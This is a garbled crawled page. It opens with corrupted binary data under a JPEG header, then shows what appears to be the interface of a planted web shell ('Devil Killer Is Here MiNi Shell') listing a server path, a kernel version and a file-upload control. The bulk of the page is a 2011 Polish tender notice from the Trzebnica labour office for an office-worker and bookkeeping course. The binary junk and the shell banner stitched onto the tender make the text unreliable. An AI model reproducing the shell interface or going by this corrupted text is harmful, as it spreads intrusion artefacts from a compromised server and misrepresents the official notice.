JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110519/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110519/121762-N-2011.html

<p class="kh_header"><b>Trzebnica: Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia w kierunku Profesjonalny pracownik biurowy z elementami księgowości FK i GM dla osób zarejestrowanych w Powiatowym Urzędzie Pracy w Trzebnicy</b><br>
<b>Numer ogłoszenia: 121762 - 2011; data zamieszczenia: 19.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Trzebnicy , ul. Ignacego Daszyńskiego 44-46, 55-100 Trzebnica, woj. dolnośląskie, tel. 0-71 312-11-54, 387-05-65, faks 0-71 312-11-54.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.praca.trzebnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia w kierunku Profesjonalny pracownik biurowy z elementami księgowości FK i GM dla osób zarejestrowanych w Powiatowym Urzędzie Pracy w Trzebnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Planowane jest przeszkolenie do 10 osób w terminie do 29 lipca 2011. 

Szkolenie ma na celu przygotowanie uczestników szkolenia do wykonywania pracy przede wszystkim na stanowiskach  biurowych wymagających wiedzy i praktycznych umiejętności do samodzielnego prowadzenia sekretariatu  i organizacji pracy biurowej z uwzględnieniem podstawowych  zagadnień finansowo - księgowych, gospodarki magazynowej, elementów prawa pracy, podstaw zamówień publicznych z wykorzystaniem programów komputerowych. 

Program szkolenia powinien wykorzystywać standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych, dostępne w bazach danych prowadzonych przez Ministerstwo Pracy 
i Polityki Społecznej znajdujących się na stronie internetowej: www.standardyiszkolenia.praca.gov.pl
Szkolenie ma składać się z części teoretycznej i praktycznej obejmującej m.in. :
 - zagadnienia z zakresu organizacji i obsługi sekretariatu w tym  m.in. dokumentacja w pracy biurowej; dokumenty regulujące czynności biurowe; sporządzanie korespondencji i redagowanie pism; zarządzanie czasem i organizacja pracy własnej; obieg informacji w firmie w tym z wykorzystaniem urządzeń  biurowych i elektronicznym obiegiem dokumentów; kontakty z klientem; biurowy savir-vivre; informacyjna i reprezentacyjna funkcja sekretariatu; przechowywanie i archiwizowanie dokumentacji;
- pomoc w prowadzeniu pełnych rejestrów wszystkich transakcji  finansowych przedsiębiorstw, zgodnie z głównymi zasadami księgowania;
- weryfikowanie dokładności dokumentów i rejestrów, dotyczących wypłat, przychodów i innych finansowych transakcji;
- pomoc w przygotowywaniu okresowych oświadczeń i sprawozdań finansowych;
- dokumentacja magazynowa  w tym min. obliczenia i wypełnianie dokumentacji, sporządzania arkuszy spisowych - protokoły, prace inwentaryzacyjne
- dokumentacja handlowa w tym m.in. zamówienia, oferty, umowy, przyjmowanie zwrotu zakupionego towaru - protokół 
- dokumentacja związana ze sprzedażą  w tym m.in. faktury, rachunki, paragony, podstawowe zasady sporządzania faktur, stawki podatku VAT, udzielanie rabatu, reklamacje i zwroty - dokumenty korygujące
- stosowanie wiedzy z zakresu zasad księgowania i praktyki w celu określania i rozwiązywania problemów powstałych w czasie pracy;
- elementy prawa pracy w tym umowy o prace i umowy cywilno-prawne,  wypowiedzenie, urlopy, naliczanie czasu  pracy, dokumentacja pracownicza 
- płace
- podstawy zamówień publicznych 
- obsługa komputera z wykorzystaniem programów użytkowych w księgowości FK i GM oraz kadrowo-płacowych, WORD, EXCEL, Power Pont, 
- zajęcia aktywizujące przygotowujące i motywujące do podjęcia pracy zgodnej z kierunkiem ukończonego szkolenia.

Minimalna ilość godzin przeznaczona na poszczególne zagadnienia:
-	Sekretariat/organizacja biura - 20
-	Finanse-Księgowość - 50
-	Gospodarka magazynowa - 30
-	Elementy prawa pracy i płace - 20
-	Podstawy zamówień publicznych - 6
-	Zajęcia aktywizujące - 6
Zajęcia z wykorzystaniem programów komputerowych ogółem nie mogą być w wymiarze niższym niż 120 godzin, w tym EXCEL  - nie mniej niż 20 godzin, edytor tekstu Word w stopniu zaawansowanym - nie mniej niż 6 godzin,  Power Point - nie mniej niż 12 godzin.

Uczestnikami szkolenia będą osoby znające podstawy obsługi komputera, zwłaszcza obsługę programu WORD.

Egzamin końcowy musi być integralną częścią programu oraz wchodzić w skład ilości godzin przewidzianych programem. Egzamin końcowy musi być ujęty w Programie kursu w pozycji Plan nauczania z uwzględnieniem ilości godzin przewidzianych na ten egzamin oraz w Szczegółowym harmonogramie szkolenia z uwzględnieniem daty tego egzaminu i ilości godzin przewidzianych na egzamin.

Program szkolenia ogólnie powinien zawierać 200 godzin zegarowych. Godzina  zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne  liczące 45 min oraz przerwę, liczącą średnio 15 minut, gdyż długość przerw może być ustalana w sposób elastyczny. Zamawiający zakłada przeprowadzenie zajęć szkolenia między godzinami 8.00 - 16.00, średnio po 6-7 godzin zegarowych dziennie. Godziny rozpoczęcia i zakończenia zajęć powinny być dostosowane do możliwości dojazdu osób bezrobotnych. Szkolenie powinno odbywać się w dni od poniedziałku do piątku. 
Szkolenie ma być realizowane według planu nauczania obejmującego przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu zgodnie z art. 40 ust. 4 ustawy z dnia 20 kwietnia 2004 r. 
o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r. nr 69, poz. 415 z późn. zm.). 

Wykonawca zobowiązany jest do przeprowadzenia szkolenia w wymiarze 30 dni.

Wykonawca przygotuje Program szkolenia zgodnie z załącznikiem nr 4.
Najpóźniej w dniu rozpoczęcia zajęć Wykonawca przedstawi Zamawiającemu harmonogram szkolenia zawierający informacje zawarte we wzorze Załącznika nr  4a.
Na pierwszych zajęciach Wykonawca przedstawi każdemu uczestnikowi szkolenia program szkolenia i harmonogram szkolenia. Wykonawca zapewni każdemu uczestnikowi harmonogram szkolenia. 
Wykonawca zobowiązany będzie do prowadzenia indywidualnych list obecności uczestników szkolenia z podziałem na dni i godziny.

Wykonawca zapewni uczestnikom szkolenia odpowiednie materiały szkoleniowe 
z oznakowaniem unijnym oraz nazwą projektu a także skrypty, zeszyty, materiały piśmiennicze, które po zakończeniu szkolenia przejdą w posiadanie absolwentów szkolenia.
Wykonawca może dołączyć do oferty w formie papierowej lub nośniku elektronicznym wzory materiałów dydaktycznych proponowanych do realizacji zamówienia.

W trakcie trwania szkolenia (najpóźniej w połowie) oraz po jego zakończeniu Wykonawca przeprowadzi wśród wszystkich uczestników ocenę szkolenia za pomocą formularza ankiety oceniającej, będącego załącznikiem do programu.

Szkolenie powinno zakończyć się egzaminem, a nabyte umiejętności powinny być potwierdzone zaświadczeniem o ukończeniu szkolenia lub innym dokumentem potwierdzającym ukończenie szkolenia i uzyskanie kwalifikacji zgodne z Rozporządzeniem Edukacji i Nauki z dnia 
3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006r. nr 31 poz. 216).
Wykonawca zobowiązany będzie po zakończeniu szkolenia wydać uczestnikom szkolenia także certyfikaty z oznakowaniem unijnym, logo EFS i logo PO KL oraz nazwą projektu.
Zaświadczenie lub inny dokument potwierdzający ukończenie szkolenia i uzyskanie kwalifikacji mają zawierać: 
a)	numer z rejestru,
b)	imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość,
c)	nazwę instytucji szkoleniowej przeprowadzającej szkolenie,
d)	formę i nazwę szkolenia,
e)	okres trwania szkolenia,
f)	miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji,
g)	tematy i wymiar godzin zajęć edukacyjnych,
h)	podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie.

Szkolenie ma być przeprowadzone w sali wykładowej dostosowanej do wielkości grupy 
i z osobnymi miejscami dla każdego uczestnika szkolenia, z odpowiednim oświetleniem, ogrzewaniem, wentylacją i akustyką zgodnie z obowiązującymi  przepisami  BHP, także 
z zapewnieniem wyposażenia sali w odpowiedni sprzęt techniczny (tzn. rzutniki, tablice itp.). Szkolenie z części zajęć praktycznych  ma odbyć się w sali wyposażonej odpowiednio w  komputery z oprogramowaniem odpowiednim do zakresu przedmiotowego szkolenia. Wykonawca zapewni każdemu uczestnikowi szkolenia samodzielne miejsce do zajęć praktycznych  przy komputerze.

Szkolenie ma być przeprowadzone w Trzebnicy.

Zamawiający wymaga, aby w przypadku korzystania z wynajmowanego ( dzierżawionego) lokalu lub sprzętu podmiot ubiegający się o udzielenie zamówienia załączył do  oferty informację 
o podstawie dysponowania tymi zasobami.

W okresie trwania szkolenia Wykonawca zobowiązany będzie w miejscu szkolenia do umieszczenia informacji o szkoleniu z oznakowaniem unijnym oraz nazwą projektu współfinansowanego ze środków EFS. 

Szkolenie będzie współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach projektu systemowego PO KAPITAŁ realizowanego w ramach Priorytetu VI PO KL: Rynek pracy otwarty dla wszystkich, Działanie 6.1: Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.3: Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych PO KL..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek, gdy przedstawi aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy Prawo zamówień publicznych, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w przypadku osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt. 2 ustawy Prawo zamówień publicznych. Zamawiający będzie dokonywał oceny spełnienia warunków na podstawie złożonych oświadczeń i dokumentów potwierdzających ich spełnienie zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek gdy wykaże: że należycie wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności szkoleniowej jest krótszy - w tym okresie usługi szkoleniowe odpowiadające przedmiotowi niniejszego zamówienia, tj. co najmniej 3  szkolenia grupowe lub dla ogółem minimum 50 osób  z  zakresu sekretariatu organizacji biura i/lub księgowości i/lub gospodarki magazynowej i/lub prawa pracy i/lub  kadr i płac w wymiarze nie krótszym niż  30 godzin. Należy uwzględnić tylko szkolenia zawierające w programie min. 30 godz. zajęć dydaktycznych z tematyki z  zakresu sekretariatu organizacji biura i/lub księgowości i/lub gospodarki magazynowej i/lub prawa pracy i/lub  kadr i płac.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek, gdy wskaże miejsce szkolenia dostosowane ilością i jakością pomieszczeń oraz wyposażone w sprzęt i pomoce dydaktyczne odpowiednio do potrzeb szkolenia, z uwzględnieniem bezpiecznych i higienicznych warunków pracy i nauki, a także zapewni każdemu uczestnikowi szkolenia samodzielne miejsce do zajęć praktycznych przy komputerze, tj. wykaże, że będzie dysponował 10 komputerami.Zamawiający będzie dokonywał oceny spełnienia warunków na podstawie złożonych oświadczeń i dokumentów potwierdzających ich spełnienie zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek gdy wskaże kadrę dydaktyczną, składającą się z minimum 4 osób, z których każda musi posiadać co najmniej: 1) wykształcenie wyższe; 2) ukończony kurs pedagogiczny, studium pedagogiczne, studia pedagogiczne lub inny dokument uprawniający do prowadzenia zajęć; 3) doświadczenie w realizacji co najmniej 3 szkoleń/zajęć w zakresie tematycznym odpowiadającym swoim zakresem przedmiotowi zamówienia  lub w przypadku nauczycieli roczny staż pracy dydaktycznej związanej z przedmiotem zamówienia. Zamawiający będzie dokonywał oceny spełnienia warunków na podstawie złożonych oświadczeń i dokumentów potwierdzających ich spełnienie zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>c)	preliminarz kosztów szkolenia - Załącznik nr 5 niniejszej specyfikacji istotnych warunków zamówienia ). Ryzyko konieczności wykonania wszelkich prac towarzyszących, mogących pojawić się w trakcie realizacji zamówienia obciąża Wykonawcę i należy uwzględnić je w ofercie.  Wszystkie wartości, powinny być liczone w walucie polskiej z dokładnością do dwóch miejsc po przecinku w rozumieniu ustawy z dnia 5 lipca 2001 r. o cenach (Dz. U. z 2002 r. Nr 97, poz. 1050 ze zm.) oraz ustawy z dnia 7 lipca 1994 r. o denominacji złotego (Dz. U. z 1994 r. Nr 84, poz. 386 z późn. zm.). Cena brutto oferty powinna zawierać wszystkie koszty i składniki związane z wykonaniem zamówienia z uwzględnieniem podatku od towarów i usług, jakie poniesie Wykonawca wykonując zleconą usługę szkoleniową, w tym m.in.: wynagrodzenie, wynajem (eksploatacja, dzierżawa) sal, wynajem (eksploatacja, dzierżawa) sprzętu, materiały szkoleniowe, w tym przeznaczone na własność dla uczestników, itd. W cenie nie należy ujmować kosztów ubezpieczenia od następstw nieszczęśliwych wypadków. Preliminarz szkolenia należy przygotować dla grupy 10-cio osobowej.

d)	pełnomocnictwo - w przypadku gdy Wykonawcę reprezentuje pełnomocnik;  Wykonawca dostarczy pełnomocnictwo podpisane przez osoby reprezentujące Wykonawcę i określające zakres tego pełnomocnictwa  w formie oryginału lub w postaci kopii poświadczonej notarialnie.

e) Najpóźniej w dniu podpisania umowy Wykonawca zobowiązany będzie do przedstawienia wpisu do Rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej.

f ) W przypadku, gdy ofertę składa osoba fizyczna Zamawiający żąda, aby Wykonawca do oferty dołączył dokument, z którego będzie wynikać uprawnienie do podpisania oferty np. aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Dopuszczalna jest zmiana umowy dotycząca: 
a)	ilości osób skierowanych na szkolenie, 
b)	terminu realizacji szkolenia, 
c)	miejsca realizacji szkolenia, 
d)	kadry wykładowców
w sytuacjach, gdy zmiana taka wynika z przyczyn niezależnych, których nie można było przewidzieć w chwili podpisania umowy np. sytuacje choroby, pobytu w stacjonarnym zakładzie opieki zdrowotnej, potwierdzonego odpowiednim zaświadczeniem lekarskim na druku ZUS ZLA, zdarzenia losowe, awarie, wypowiedzenie umowy najmu (dzierżawa) sal wykładowych, wypowiedzenie umów dot. świadczenia pracy przez wykładowców, zaistnienia okoliczności niezależnych od Zamawiającego uniemożliwiających rozpoczęcie szkolenia przez maksymalną liczbę osób na skutek nieprzewidzianych okoliczności m.in.: zwolnienia lekarskiego, nie zgłoszenia się po skierowanie, podjęcia pracy przez bezrobotnego w sytuacji, gdy nie ma możliwości skierowania kolejnej osoby. 

3.	Wykonawca jest zobowiązany niezwłocznie zawiadomić pisemnie Zamawiającego o zaistniałej sytuacji i przedstawić propozycję dokonania zmiany. 
4.	W przypadku prośby o zmianę wykładowcy Wykonawca zobowiązany jest przedstawić zastępstwo tej osoby przez osobę o kwalifikacjach zawodowych co najmniej równych co osoba zastępowana. Ponadto Wykonawca będzie zobowiązany przedstawić Zamawiającemu wraz z wnioskiem wypełniony załącznik nr 6 do specyfikacji istotnych warunków zamówienia. 
5.	W przypadku zmiany miejsca szkolenia Wykonawca zobowiązany jest zapewnić warunku lokalowe co najmniej równoważne do poprzednich. Ponadto Wykonawca będzie zobowiązany przedstawić Zamawiającemu wraz z wnioskiem wypełniony załącznik nr 7 do specyfikacji istotnych warunków zamówienia. 
6.	Wszelkie zmiany mogą nastąpić wyłącznie wtedy, gdy Zamawiający wyrazi na nie zgodę. 
7.	Żadna ze zmian nie może wpłynąć na zmianę ceny szkolenia w przeliczeniu na 1 uczestnika.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.praca.trzebnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy 
ul. Daszyńskiego 44-46 
55-100 Trzebnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2011 godzina 09:00, miejsce: Powiatowy Urząd Pracy 
ul. Daszyńskiego 44-46 
55-100 Trzebnica 
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




